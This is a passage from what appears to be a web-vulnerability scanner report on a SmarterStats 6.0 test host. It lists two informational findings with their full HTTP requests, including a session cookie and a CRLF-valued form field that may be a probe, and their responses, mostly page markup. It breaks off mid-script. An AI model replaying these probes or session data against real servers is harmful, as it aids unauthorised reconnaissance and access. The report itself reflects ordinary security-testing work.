   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Skin.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Skin.xml

Request

GET /App_Themes/Default/Skin.xml HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:11:01 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<span><h1>Server Error in '/' Application.<hr width=100% size=1 color=silver></h1>

<h2> <i>HTTP Error 403 - Forbidden.</i> </h2></span>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

11.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmImportSettings.aspx

Request

POST /Client/frmImportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14882

ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00_MPH_grdImportFilters_HiddenInput=&ctl00%24MPH%24txtDomainUrl_SettingText=555-555-0199@example.com&ctl00%24MPH%24chkStripURL_SettingCheck=on&ctl00_MPH_grdImportFilters_HiddenLSR=&__VIEWSTATE=[ViewState value omitted]&ctl00_MPH_grdDynamicPages_HiddenInput=&ctl00%24MPH%24txtQueryStringItemsToIgnore_SettingText=%0d%0a&ctl00%24MPH%24lstTimeZone_SettingDropDown=1&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00_MPH_grdDynamicPages_HiddenLSR=

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:18 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:04:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41960
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Site Importing - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmImportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=pVn15ziXvQY5aBffxiDTK6PUkVd1wbLwZ8qHXgDTDQU-gDmeOQZCbCnf3LN8cb6wKZJNHgRyjasDbTS9TuTZ7GXz6UL6zabFuTHuGM9izuBi-gzcVhEZX9Fg6cQx4oJc6iXtzA8ahWISPmTnWBlMNk0W7V9Kl_5HxQNbPSm8qmJcO3ou2wT9aun3Nb592DHA0&amp;t=26c081" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnEditImportFilters','','ctl00$BPH$btnDeleteImportFilters','','ctl00$BPH$btnEditDynamicPages','','ctl00$BPH$btnDeleteDynamicPages','','ctl00$MPH$lnkRefresh','','ctl00$MPH$lnkRefreshAfterReprocessing',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Site Importing
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_BPH_mnuAdd' name='ctl00$BPH$mnuAdd' style='z-index:800'>
   <li class='hmItem hmFirst hmLast' id='ctl00_BPH_mnuAdd_btnAdd' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
   <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
       <li class='hmItem hmFirst' id='ctl00_BPH_mnuAdd_btnAdd_btnExclusion' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
       <li class='hmItem hmLast' id='ctl00_BPH_mnuAdd_btnAdd_btnDynamicPage' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
   </ul><div class='hmScrollDown'></div></div>
   </li>
</ul>
</div>

   <div id="divImportFilterButtons" style="display: none;" class="TogglableButtons">
       
       <div id="ctl00_BPH_btnEditImportFilters" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditImportFilters(); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDeleteImportFilters" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters(); return false;"><span class="BBInner">Delete</span></a></div>
   </div>
   <div id="divDynamicPagesButtons" style="display: none;" class="TogglableButtons">
       
       <div id="ctl00_BPH_btnEditDynamicPages" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditDynamicPages(); return false;"><span class="BBInner">Edit</span></a></div>
       <div id="ctl00_BPH_btnDeleteDynamicPages" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteDynamicPages(); return false;"><span class="BBInner">Delete</span></a></div>
   </div>
   <div id="ctl00_BPH_btnReprocess" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ShowReprocessPopup();; return false;"><span class="BBInner">Reprocess</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel3">
   
           
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Ignore Items</span></span></a></li>
       <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Import Filtering</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem4'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Dynamic Pages</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel5">
   
           <a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_lnkRefreshAfterReprocessing" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkRefreshAfterReprocessing&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDomainUrl">
                   <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" value="555-555-0199@example.com" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstTimeZone">
                   <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><select name="ctl00$MPH$lstTimeZone_SettingDropDown" id="ctl00_MPH_lstTimeZone_SettingDropDown">
                       <option value="0">(GMT-12:00) International Date Line West</option>
                       <option selected="selected" value="1">(GMT-11:00) Midway Island, Samoa</option>
                       <option value="2">(GMT-10:00) Hawaii</option>
                       <option value="3">(GMT-09:00) Alaska</option>
                       <option value="-2147483579">(GMT-08:00) Tijuana, Baja California</option>
                       <option value="4">(GMT-08:00) Pacific Time (US &amp; Canada)</option>
                       <option value="-2147483580">(GMT-07:00) Chihuahua, La Paz, Mazatlan - New</option>
                       <option value="10">(GMT-07:00) Mountain Time (US &amp; Canada)</option>
                       <option value="15">(GMT-07:00) Arizona</option>
                       <option value="13">(GMT-07:00) Chihuahua, La Paz, Mazatlan - Old</option>
                       <option value="25">(GMT-06:00) Saskatchewan</option>
                       <option value="30">(GMT-06:00) Guadalajara, Mexico City, Monterrey - Old</option>
                       <option value="20">(GMT-06:00) Central Time (US &amp; Canada)</option>
                       <option value="-2147483581">(GMT-06:00) Guadalajara, Mexico City, Monterrey - New</option>
                       <option value="33">(GMT-06:00) Central America</option>
                       <option value="35">(GMT-05:00) Eastern Time (US &amp; Canada)</option>
                       <option value="40">(GMT-05:00) Indiana (East)</option>
                       <option value="45">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>
                       <option value="-2147483573">(GMT-04:30) Caracas</option>
                       <option value="-2147483576">(GMT-04:00) Manaus</option>
                       <option value="50">(GMT-04:00) Atlantic Time (Canada)</option>
                       <option value="55">(GMT-04:00) La Paz</option>
                       <option value="56">(GMT-04:00) Santiago</option>
                       <option value="60">(GMT-03:30) Newfoundland</option>
                       <option value="70">(GMT-03:00) Buenos Aires, Georgetown</option>
                       <option value="73">(GMT-03:00) Greenland</option>
                       <option value="65">(GMT-03:00) Brasilia</option>
                       <option value="-2147483575">(GMT-03:00) Montevideo</option>
                       <option value="75">(GMT-02:00) Mid-Atlantic</option>
                       <option value="80">(GMT-01:00) Azores</option>
                       <option value="83">(GMT-01:00) Cape Verde Is.</option>
                       <option value="90">(GMT) Casablanca, Monrovia, Reykjavik</option>
                       <option value="85">(GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London</option>
                       <option value="95">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>
                       <option value="100">(GMT+01:00) Sarajevo, Skopje, Warsaw, Zagreb</option>
                       <option value="105">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>
                       <option value="110">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>
                       <option value="113">(GMT+01:00) West Central Africa</option>
                       <option value="130">(GMT+02:00) Athens, Bucharest, Istanbul</option>
                       <option value="-2147483583">(GMT+02:00) Beirut</option>
                       <option value="-2147483582">(GMT+02:00) Amman</option>
                       <option value="135">(GMT+02:00) Jerusalem</option>
                       <option value="-2147483578">(GMT+02:00) Windhoek</option>
                       <option value="125">(GMT+02:00) Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius</option>
                       <option value="140">(GMT+02:00) Harare, Pretoria</option>
                       <option value="115">(GMT+02:00) Minsk</option>
                       <option value="120">(GMT+02:00) Cairo</option>
                       <option value="155">(GMT+03:00) Nairobi</option>
                       <option value="145">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>
                       <option value="150">(GMT+03:00) Kuwait, Riyadh</option>
                       <option value="158">(GMT+03:00) Baghdad</option>
                       <option value="-2147483577">(GMT+03:00) Tbilisi</option>
                       <option value="160">(GMT+03:30) Tehran</option>
                       <option value="165">(GMT+04:00) Abu Dhabi, Muscat</option>
                       <option value="170">(GMT+04:00) Caucasus Standard Time</option>
                       <option value="-2147483584">(GMT+04:00) Baku</option>
                       <option value="-2147483574">(GMT+04:00) Yerevan</option>
                       <option value="175">(GMT+04:30) Kabul</option>
                       <option value="180">(GMT+05:00) Ekaterinburg</option>
                       <option value="185">(GMT+05:00) Islamabad, Karachi, Tashkent</option>
                       <option value="200">(GMT+05:30) Sri Jayawardenepura</option>
                       <option value="190">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>
                       <option value="193">(GMT+05:45) Kathmandu</option>
                       <option value="201">(GMT+06:00) Almaty, Novosibirsk</option>
                       <option value="195">(GMT+06:00) Astana, Dhaka</option>
                       <option value="203">(GMT+06:30) Yangon (Rangoon)</option>
                       <option value="207">(GMT+07:00) Krasnoyarsk</option>
                       <option value="205">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>
                       <option value="225">(GMT+08:00) Perth</option>
                       <option value="210">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>
                       <option value="227">(GMT+08:00) Irkutsk, Ulaan Bataar</option>
                       <option value="220">(GMT+08:00) Taipei</option>
                       <option value="215">(GMT+08:00) Kuala Lumpur, Singapore</option>
                       <option value="240">(GMT+09:00) Yakutsk</option>
                       <option value="230">(GMT+09:00) Seoul</option>
                       <option value="235">(GMT+09:00) Osaka, Sapporo, Tokyo</option>
                       <option value="250">(GMT+09:30) Adelaide</option>
                       <option value="245">(GMT+09:30) Darwin</option>
                       <option value="275">(GMT+10:00) Guam, Port Moresby</option>
                       <option value="255">(GMT+10:00) Canberra, Melbourne, Sydney</option>
                       <option value="270">(GMT+10:00) Vladivostok</option>
                       <option value="260">(GMT+10:00) Brisbane</option>
                       <option value="265">(GMT+10:00) Hobart</option>
                       <option value="280">(GMT+11:00) Magadan, Solomon Is., New Caledonia</option>
                       <option value="285">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>
                       <option value="290">(GMT+12:00) Auckland, Wellington</option>
                       <option value="300">(GMT+13:00) Nuku&#39;alofa</option>

                   </select></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_IgnoreItemsTab' class='' style='display:none'>
           <span id="ctl00_MPH_IgnoreItemsTab">
                   <table class="WarningMessage"
           <tr><td class="WarningMessage">
           <div class="WarningMessage">
           These settings will permanently affect imported data. It is recommended that you retain the original site logs.</div></td></tr></table>
           
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtQueryStringItemsToIgnore">
                   <td id="ctl00_MPH_txtQueryStringItemsToIgnore_Setting" class="Indent Setting" colspan="2"><span class='Label'>Query String Items to Ignore<br /></span><textarea name="ctl00$MPH$txtQueryStringItemsToIgnore_SettingText" rows="12" cols="50" id="ctl00_MPH_txtQueryStringItemsToIgnore_SettingText" class="text">

</textarea></td>
               </tr>
           </table>
                   <table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_chkStripURL">
                   <td id="ctl00_MPH_chkStripURL_Setting" class="Indent Setting"><input id="ctl00_MPH_chkStripURL_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripURL_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkStripURL_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_ImportFilteringTab' class='' style='display:none'>
           <span id="ctl00_MPH_ImportFilteringTab">
                   <span id="ctl00_MPH_ctxImportFilters">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
                   <li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm0_hm1' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
               <li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdImportFilters">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdImportFilters_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdImportFilters_HiddenInput" id="ctl00_MPH_grdImportFilters_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdImportFilters_HiddenLSR" id="ctl00_MPH_grdImportFilters_HiddenLSR" value="" />
</div>
</div>

               </span></div>
       
               <div id='ctl00_MPH_DynamicPagesTab' class='' style='display:none'>
           <span id="ctl00_MPH_DynamicPagesTab">
                   <span id="ctl00_MPH_ctxDynamicPages">
<!-- HyperMenu -->
           <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
               <li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
               <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
                   <li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Import Filter</a></li>
                   <li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm0_hm1' style='z-index: 800'><a class='hmA' href='#'>Dynamic Page</a></li>
               </ul><div class='hmScrollDown'></div></div>
               </li>
               <li class='hmItem' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
               <li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
           </ul>
           <div class='hmScrollDown'></div></div>
           </div>
           </span>
                   
<div class="HyperGridWrapper" id="ctl00_MPH_grdDynamicPages">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdDynamicPages_Table"><tr><td class="NoItems" colspan="0">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_grdDynamicPages_HiddenInput" id="ctl00_MPH_grdDynamicPages_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdDynamicPages_HiddenLSR" id="ctl00_MPH_grdDynamicPages_HiddenLSR" value="" />
</div>
</div>

               </span></div>
       
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmimportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">

function ShowReprocessPopup()
{
SpawnHyperWindow("/Client/Popups/frmReprocess.aspx", 300, 200, DoRefreshAfterReprocess);
}
function TabChanged(tabSelected)
{
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem3") ? $("#divImportFilterButtons").hide() : $("#divImportFilterButtons").show();
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem4") ? $("#divDynamicPagesButtons").hide() : $("#divDynamicPagesButtons").show();
}
function PopupImportFilter(url) {
SpawnHyperWindow(url, 430, 200, DoRefresh);
}
function PopupImportDynamicPage(url) {
SpawnHyperWindow(url, 440, 370, DoRefresh);
}
function DoRefresh() {
__doPostBack('ctl00$MPH$lnkRefresh','')
}
function DoRefreshAfterReprocess() {
__doPostBack('ctl00$MPH$lnkRefreshAfterReprocessing','')
}

   </script>


   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl04(evt) {
   $('#ctl00_MPH_ctl04').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}

function ShowContextMenu_ctl00_MPH_ctl05(evt) {
   $('#ctl00_MPH_ctl05').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}

function DelayedSetupctl00_MPH_grdImportFilters() { }
if (self.ctl00_MPH_grdImportFiltersHGIsCallback)
   DelayedSetupctl00_MPH_grdImportFilters();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdImportFilters, 100);});
self.ctl00_MPH_grdImportFiltersHGIsCallback = true;

function DelayedSetupctl00_MPH_grdDynamicPages() { }
if (self.ctl00_MPH_grdDynamicPagesHGIsCallback)
   DelayedSetupctl00_MPH_grdDynamicPages();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdDynamicPages, 100);});
self.ctl00_MPH_grdDynamicPagesHGIsCallback = true;
$(function() { SetTopTitle('Site\x20Importing'); });
$(function() { $('#ctl00_BPH_mnuAdd').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_mnuAdd_btnAdd_btnExclusion":"PopupImportFilter(\u0027/Client/Popups/frmImportFilter.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);","ctl00_BPH_mnuAdd_btnAdd_btnDynamicPage":"PopupImportDynamicPage(\u0027/Client/Popups/frmImportDynamicPage.aspx?UniqueID=62163e92b4114ce98972e4e87dbca8ca\u0027);"},"ClientCallbacks":{}}); });
function DoEdit_ctl00_BPH_btnEditImportFilters() {
   if(self.ctl00_MPH_grdImportFilters == null || !self.ctl00_MPH_grdImportFilters.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_grdImportFilters.GetUrlForSelectedRow == null) return;
   var url = ctl00_MPH_grdImportFilters.GetUrlForSelectedRow();
   if (url != null) { var grid = ctl00_MPH_grdImportFilters; var row = grid.GetSelectedRows()[0]; if (grid.GetVisibleRowByUid) row = grid.GetVisibleRowByUid(row); grid.DoDoubleClick(grid, row); }
   else {
       if (ctl00_MPH_grdImportFilters.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
       else ShowAlertWindow('You cannot edit multiple items at once.');
   }
}
function DoDeleteQuery_ctl00_BPH_btnDeleteImportFilters() {
   if (!self.ctl00_MPH_grdImportFilters) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdImportFilters.GetSelectedRowCount ? ctl00_MPH_grdImportFilters.GetSelectedRowCount() : ctl00_MPH_grdImportFilters.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDeleteImportFilters);
}
function DoDelete_ctl00_BPH_btnDeleteImportFilters() { __doPostBack('ctl00$BPH$btnDeleteImportFilters',''); }
function DoEdit_ctl00_BPH_btnEditDynamicPages() {
   if(self.ctl00_MPH_grdDynamicPages == null || !self.ctl00_MPH_grdDynamicPages.InitializeGrid) return ShowAlertWindow('No item has been selected');
   if (ctl00_MPH_grdDynamicPages.GetUrlForSelectedRow == null) return;
